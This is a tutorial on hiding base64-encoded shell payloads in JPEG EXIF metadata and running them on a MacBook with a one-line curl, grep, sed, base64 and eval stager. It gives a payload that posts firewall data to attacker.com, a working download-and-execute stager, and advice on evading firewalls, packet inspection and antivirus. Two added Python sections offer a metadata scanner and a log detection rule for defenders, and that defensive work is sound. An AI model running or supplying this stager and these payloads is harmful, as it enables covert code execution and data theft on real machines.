Complex shell scripts can be embedded in photo metadata and later used to exploit a MacBook. In addition to obfuscating the true nature of an attack, this technique can be used to evade network firewalls and vigilant sysadmins.
In this attack scenario, a malicious command will be embedded directly in the EXIF metadata of an image file. The attacker would host the malicious image on a public site like Flickr, making it available for anyone to download. A stager is then created to download the image, extract the metadata, and execute the embedded command.
To be clear, the image file is not double-clicked to execute the embedded command. That is a different type of macOS attack, one we've covered in another article. Instead, the command is hidden in the metadata of the image and used as a payload delivery system. The stager and the payload are two different parts of the attack: the stager is designed to download the image and execute the embedded payload, while the payload is the final bit of code (embedded in the image) that executes one or more commands.
Why embed payloads in photos?
So, why have a stager at all if the attacker is already capable of executing code on the target MacBook? Well, mainly, varying degrees of evasion. Stagers can also be quite small, just ~1
In most scenarios, it is not necessary to hide a payload in an image file. In very secure environments, however, where every domain is logged by firewall software, it may be beneficial to hide both the content and the origin of the payload.
1. Firewall Evasion
With software such as pfSense, every domain and IP address that each device on the network visits is logged. With commercial software such as Fortinet's FortiGate firewall, every packet can be thoroughly dissected for analysis. These types of firewalls make it difficult for an attacker to use simple TCP connections established with Netcat to maintain access to the compromised device or to move further into the network.
Using images to hide payloads can make it difficult for sysadmins monitoring traffic to identify the activity as malicious or suspicious.
2. Deep Packet Inspection Evasion
In secured environments, operating systems can be configured to use proprietary certificates, allowing network administrators to decrypt data to and from devices on the network. With tools like Wireshark, it is then possible to reassemble TCP streams and recover image files from the decrypted data.
3. Antivirus Evasion
Premium versions of Avast and AVG antivirus software can analyze and detect certain types of stagers and payloads. For example, the AV software can identify most stagers created by Empire. In hardened network environments, a high degree of obfuscation may be required to avoid detection signatures. Obfuscated stagers can make it difficult for AV software to detect the true nature of a particular file.
Tools to be familiar with
Before moving forward, you should have a general comfort with tools like curl, system_profiler, exiftool, grep, and Bash scripts. All of these have been covered on Null Byte before in one way or another.
To get started, download the image to be used in the attack. The stager (shown in a later step) does not actually save the image to the target computer, so it does not have to be a picture of anything particularly relevant. For demonstration purposes, we can use my Twitter profile picture, which can be downloaded with wget and saved (-O) as image.jpg in the /tmp directory.
wget 'https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg
--2019-05-15 06:50:22--  https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg
Resolving pbs.twimg.com (pbs.twimg.com)... 188.8.131.52, 2606:2800:220:1410:489:141e:20bb:12f6
Connecting to pbs.twimg.com (pbs.twimg.com)|72.21.91.70|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19316 (19K) [image/jpeg]
Saving to: 'image.jpg'

image.jpg           100%[=================================>]  18.86K  64.4KB/s    in 0.3s

2019-05-02 06:50:25 (64.4 KB/s) - 'image.jpg' saved [19316/19316]
For this example, we'll first learn to execute a simple command. When the target runs the payload embedded in the image, it will create an empty file named "hacked" on the macOS desktop.
First, use printf, base64, and tr to encode the payload. Base64 will encode the string, while tr will delete (-d) the trailing newline (\n). Always wrap the payload (touch ~/Desktop/hacked) in single quotes.
printf 'touch ~/Desktop/hacked' | base64 | tr -d '\n'
A more complex payload involving the macOS system_profiler command can be used to perform situational awareness, with curl to exfiltrate the command's output to the attacker's server.
printf 'd=$(system_profiler SPFirewallDataType);curl -s --data "$d" -X POST http://attacker.com/index.php' | base64 | tr -d '\n'
ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA==
To take it a step further, it would be possible to encode an entire Bash script, compressed into one line. In my tests, there was no limit to the number of characters that can be embedded in a metadata tag.
cat /path/to/any_script.sh | base64 | tr -d '\n'
Step 3: Embed the payload in the image
To insert the encoded payload into the image, install exiftool.
apt-get update && apt-get install exiftool -V
Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting 'libimage-exiftool-perl' instead of 'exiftool'
The following additional packages will be installed:
  libarchive-zip-perl (1.64-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1+b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1)
Suggested packages:
  liben code male extract (0.23-5+b1) libpod2 base perl (0.043-2)
The following NEW packages will be installed:
  libarchive-zip-perl (1.64-1) libimage-exiftool-perl (11.16-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1+b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1)
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 3,629 kB of archives.
After this operation, 21.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Delete any EXIF metadata that may already be in the image.
exiftool -all= image.jpg
1 image file updated
Then use exiftool to add a metadata tag; this will work with any unused tag that can hold the encoded payload. The Certificate tag is used in this demonstration.
exiftool -Certificate='dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==' image.jpg
1 image files updated
Once that is done, verify that the Certificate tag was added correctly by running exiftool against the image. Notice the encoded string on line 13.
01 ExifTool Version Number         : 11.16
02 File Name                       : image.jpg
03 Directory                       : .
04 File Size                       : 21 kB
05 File Modification Date/Time     : 2019:05:02 06:50:57+00:00
06 File Access Date/Time           : 2019:05:02 06:50:57+00:00
07 File Inode Change Date/Time     : 2019:05:02 06:50:57+00:00
08 File Permissions                : rw-r--r--
09 File Type                       : JPEG
10 File Type Extension             : jpg
11 MIME Type                       : image/jpeg
12 XMP Toolkit                     : Image::ExifTool 11.16
13 Certificate                     : dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==
14 Image Width                     : 400
15 Image Height                    : 400
16 Encoding Process                : Progressive DCT, Huffman coding
17 Bits Per Sample                 : 8
18 Color Components                : 3
19 Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
20 Image Size                      : 400x400
21 Megapixels                      : 0.160
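The exiftool listing above is how the author verifies the tag by eye; the defender's version of the same check is a scanner that walks the JPEG itself and flags metadata values that base64-decode into shell text. The following Python is an added example, not code from the original article or from ExifTool. It assumes the payload lands in an XMP packet inside an APP1 segment as an xmpRights:Certificate element (which is how the "XMP Toolkit" line in the listing suggests ExifTool stored it); the JPEG fixture it builds is constructed for the demonstration, not the page's image.

```python
"""Scan JPEG metadata segments for base64-encoded shell payloads.

Added example for this page: walks the JPEG marker structure, pulls the
text-bearing segments (APP1/XMP and COM), and flags tag values that
decode from base64 into something that reads like a shell command.
"""
import base64
import re
import string

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
XMP_HEADER = b"http://ns.adobe.com/xap/1.0/\x00"   # APP1 XMP namespace prefix

# Tokens that make a decoded string look like a command rather than prose.
SHELL_HINTS = ("curl ", "wget ", "bash", "/bin/", "eval ", "touch ", "$(", "; ",
               " | ", "system_profiler", "osascript", "base64", "~/", "python")

B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
TAG_RE = re.compile(r"<([\w:.-]+)>([^<]+)</\1>", re.S)   # <ns:Tag>value</ns:Tag>


def jpeg_segments(data):
    """Yield (marker, payload) for each marker segment before the scan data."""
    if data[:2] != b"\xFF" + bytes([SOI]):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (EOI, SOS):      # image data follows SOS; metadata is done
            return
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes itself
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def looks_like_shell(text):
    """True if the decoded text is printable ASCII and contains shell tokens."""
    if not text or any(c not in string.printable for c in text):
        return False
    return any(hint in text for hint in SHELL_HINTS)


def suspicious_values(data):
    """Return [(tag, decoded_command)] for metadata fields hiding shell text."""
    findings = []
    for marker, payload in jpeg_segments(data):
        if marker == 0xE1 and payload.startswith(XMP_HEADER):
            text = payload[len(XMP_HEADER):].decode("utf-8", "replace")
            candidates = TAG_RE.findall(text)
        elif marker == 0xFE:                       # COM: free-form comment
            candidates = [("COM", payload.decode("latin-1"))]
        else:
            continue
        for tag, value in candidates:
            value = value.strip()
            if not B64_RE.match(value) or len(value) % 4:
                continue
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            if looks_like_shell(decoded):
                findings.append((tag, decoded))
    return findings


def build_sample_jpeg(certificate_value):
    """Constructed fixture: a minimal JPEG whose only segment is an XMP packet
    carrying xmpRights:Certificate (assumed layout for ExifTool's -Certificate)."""
    xmp = ("<x:xmpmeta xmlns:x='adobe:ns:meta/'><rdf:RDF "
           "xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>"
           "<rdf:Description rdf:about='' "
           "xmlns:xmpRights='http://ns.adobe.com/xap/1.0/rights/'>"
           "<xmpRights:Certificate>%s</xmpRights:Certificate>"
           "</rdf:Description></rdf:RDF></x:xmpmeta>" % certificate_value).encode()
    app1 = XMP_HEADER + xmp
    segment = b"\xFF\xE1" + (len(app1) + 2).to_bytes(2, "big") + app1
    return b"\xFF\xD8" + segment + b"\xFF\xD9"


if __name__ == "__main__":
    # The page's own encoded payload, placed in the constructed fixture.
    for tag, cmd in suspicious_values(build_sample_jpeg("dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==")):
        print("suspicious %s -> %r" % (tag, cmd))
```

Run it against real files by replacing the fixture with open(path, "rb").read(). The check is deliberately two-stage: a value has to be syntactically valid base64 and decode to printable text with command-like tokens, so ordinary base64 blobs (thumbnails, colour profiles, signatures) are not reported. Strings stored in the binary EXIF IFD (for example UserComment) sit in a TIFF structure this parser does not walk; exiftool can dump those for the same decode-and-inspect pass.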
Step 4: Upload the image to a website
Finding a suitable website is tricky. There are several criteria.
Many popular sites like Twitter, Imgur, and Instagram automatically strip metadata from images when they are uploaded. This is done mainly to protect users from accidentally uploading images containing GPS coordinates that would allow cyberstalkers and cyberbullies to locate and harass them.
Images containing payloads would be stripped when uploaded to such sites. A candidate website must be tested manually by first uploading the image, then downloading it and using exiftool to see if the embedded payload is still intact.
Transport layer security is important for further obfuscating this attack. The site used to host the image should use HTTPS, which will help prevent sysadmins from analyzing the GET request in detail.
Ideally, the site used in the attack would be one the target visits frequently. For example, if the target visited a particular news site each morning, a visit to that domain would not look suspicious to sysadmins monitoring traffic on the network. On the other hand, an unusual GET request to a foreign website or adult site will probably raise some red flags. This kind of information can be gathered during the reconnaissance phase with covert packet captures. The key is to make the traffic look as normal as possible for the target's web behavior.
In my quick attempts to extract metadata from images with built-in macOS tools, none of them seemed to access or display the particular string ("Certificate") of the EXIF metadata embedded in the image. Fortunately, grep has a -a option that allows it to process binary files (i.e., images) as if they were plain text, so it can find the "Certificate" string in the metadata.
Below is an example stager that can be used to download the image, extract and decode the payload, and then run the command(s).
p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed 's/<[^>]*>//g' | base64 -D); eval $p
There are a few things going on here, so I'll break down each section of the stager.
- p=$(...) - Most of the stager is enclosed in a variable called "p" (aka payload). Nothing is saved directly to the target's macOS hard disk.
- curl -s https://website.com/image.jpg - Curl is used here to silently (-s) download the image containing the payload from a site chosen by the attacker. The image is immediately piped (|) to the following grep command.
- grep Cert -a - Grep takes the raw image data, processes it as regular text (-a), and searches for the "Cert" string. The matching output is the XML line that wraps the encoded string.
- sed 's/<[^>]*>//g' - The above output is immediately piped into this sed command. Sed removes all of the surrounding XML data (i.e., the tags around the value), leaving only the encoded string.
- base64 -D - The encoded string is piped into this base64 command, where it is decoded with the -D option, which ultimately makes the $p variable the decoded payload.
- eval $p - Finally, eval is used to evaluate the variable as a command, effectively executing the payload held in the variable.
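The breakdown above is also the detection signature: a fetch, a base64 decode and an execution sink (eval or a shell) in one command line is unusual for legitimate use, whereas any one of them alone is common. The following Python is an added example, not part of the original article, that applies that rule to a handful of constructed process-execution log lines (the log format, user and pids are invented; only the first command line is the stager from this page).

```python
"""Flag process command lines shaped like the image-metadata stager.

Added example: a rule over constructed process-execution log lines.
It fires only when a network fetch, a base64 decode and an execution
sink all appear in the same command line, so routine base64 use (or a
plain curl to an API) is not reported.
"""
import re

FETCH = re.compile(r"\b(curl|wget)\b")
DECODE = re.compile(r"\bbase64\s+(-D|-d|--decode)\b")
# "eval $var", "sh -c", "sh <file", a bare trailing shell, or "| sh".
EXEC_SINK = re.compile(r"\b(eval|sh|bash|zsh)\b\s*(\$\w+|-c|<|$)|\|\s*(sh|bash|zsh)\b")
BINARY_GREP = re.compile(r"\bgrep\b[^|]*\s-a\b")   # grep -a: text search over binary

# Constructed sample log lines (hypothetical endpoint process log, not real data).
SAMPLE_LOG = [
    'ts=2019-05-02T06:51:02Z user=alice pid=4121 parent=Terminal cmd="p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed \'s/<[^>]*>//g\' | base64 -D); eval $p"',
    'ts=2019-05-02T06:52:10Z user=alice pid=4130 parent=Terminal cmd="curl -s https://api.example.com/v1/status | jq ."',
    'ts=2019-05-02T06:53:44Z user=bob pid=4188 parent=Terminal cmd="cat build.b64 | base64 -D > build.tar.gz"',
    'ts=2019-05-02T06:54:01Z user=bob pid=4190 parent=Terminal cmd="echo aGk= | base64 -D | sh"',
]


def classify(cmd):
    """Return the indicator names present in a command line, in fixed order."""
    hits = []
    if FETCH.search(cmd):
        hits.append("fetch")
    if BINARY_GREP.search(cmd):
        hits.append("grep-a")
    if DECODE.search(cmd):
        hits.append("base64-decode")
    if EXEC_SINK.search(cmd):
        hits.append("exec-sink")
    return hits


def is_stager(cmd):
    """True when fetch, decode and execution sink all occur in one command line."""
    hits = classify(cmd)
    return all(name in hits for name in ("fetch", "base64-decode", "exec-sink"))


def scan_log(lines):
    """Return (line_number, command, indicators) for every flagged log line."""
    flagged = []
    for number, line in enumerate(lines, 1):
        match = re.search(r'cmd="(.*)"$', line)   # assumed log field layout
        if not match:
            continue
        cmd = match.group(1)
        if is_stager(cmd):
            flagged.append((number, cmd, classify(cmd)))
    return flagged


if __name__ == "__main__":
    for number, cmd, hits in scan_log(SAMPLE_LOG):
        print("line %d: %s -> %s" % (number, ", ".join(hits), cmd))
```

Only the first line is reported; the fourth has a decode and a shell sink but no fetch, and the second has a fetch with nothing executed, so neither meets the rule. The grep -a indicator is recorded but not required, because a stager could just as easily use strings or dd to pull the tag out; requiring the three-part shape rather than any single tool keeps the rule useful against the variants the article hints at.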
We can verify that the attack was successful by finding the "hacked" file on the macOS desktop.
Again, this is a very simple payload. More sophisticated attacks could involve automated browser dumping, microphone capture, situational awareness, privilege escalation, sudo password phishing, etc.
That's all there is to hiding a payload within image metadata. Stay tuned, as I'll show you how to exfiltrate data inside images (without using metadata tags) in a future article! Message me on Twitter @tokyoneon_ if you have any questions, or leave a comment below.